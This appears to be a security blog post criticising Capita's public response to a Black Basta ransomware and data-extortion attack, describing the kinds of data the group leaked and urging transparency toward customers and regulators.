Black Basta ransomware group extorts Capita with stolen customer data, Capita fumble response.
There’s an interesting piece in The Times today, where the CEO of Capita declares Capita’s response to the hack “will go down as a case history for how to deal with a sophisticated cyberattack”.
That’s a bold statement, so let us explore it.
While that may be true on a technical level in terms of containment – it is unclear what happened behind the scenes due to lack of transparency – externally, not so much.
As a bit of background, Capita are one of the largest suppliers of IT in the UK, particularly to government. They look after an enormous amount of critical infrastructure and data.
Let’s start with the outage. Capita declared it an “IT Incident”, not mentioning cybersecurity – even going so far as to deny it was due to cybersecurity issues to media.
The incident started at 5am and was detected by Capita’s Security Operations Centre, according to the interview with the CEO in The Times. The incident was ransomware deployment.
The CEO was informed at 7am. At 10am, The Times reporter Katie Prescott was informed it was too early to say if it was a cyber security attack – despite the company dealing with ransomware:
By 3pm, Capita were telling press and customers it was “IT incident”, and ignoring the cybersecurity, ransomware and extortion issue.
It wasn’t until day 3 they admitted a security angle. Capita’s website still says “there is no evidence of customer, supplier or colleague data having been compromised.”. We should test that statement.
The Times reports today “This weekend, the Russian-linked hacking group Black Basta claimed to be behind the attack, listing Capita as a recent victim on its platform.”
Black Basta are an extortion group, who exfiltrate data using rclone and hold companies to ransom. For further information, we go to the US Government:
In terms of Black Basta and Capita, they list Capita as currently being held to extortion – and provide evidence of exfiltrated data. This includes primary and secondary school job applications, a Capita nuclear document, Capita documents marked Confidential, passport scans, security vetting for customers and architecture diagrams.
Specific examples — not exhaustive — of leaked Capita data include:
- employment screening for Clifford All Saints Church of England School in Sheffield, including the PII of applicant including their home address, date of birth, history etc.
- BACS payment details for Capita Nuclear, part of Capita Business Services. This includes bank account details for 152 organisations.
- Internal floor plans of multiple buildings.
- Employment screening for Beighton Nursery Infants School, including the PII of applicant including their home address, date of birth, history etc.
- Employment offer for a teaching role at Bradfield Dungworth Primary School in Sheffield, with the signature of the Headteacher and PII of the teaching employee.
This is not abnormal for Black Basta — the group runs double extortion operations, where they first steal data — usually massive amounts — and then encrypt the organisation. They then monetise the situation by blackmailing the organisation for recovery of data, and monetise the data they stole. Currently, they are advertising the sale of Capita’s data (which will almost certainly include more than listed on their portal, given the situation with every other victim organisation so far).
Capita’s customers and regulators should be asking Capita to explain this – on the record and in writing.
Capita’s duty – from the CEO down – should include protecting customers.
Failing to disclose the loss of personal data can have serious financial and reputation damages – in short, do not cover up ransomware and extortion incidents or you may end up the case history of how not to respond.
The clock is ticking for Capita to change course, be transparent, have ownership and protect society. Cyberattacks happen to every organisation. How you respond to them truly matters.
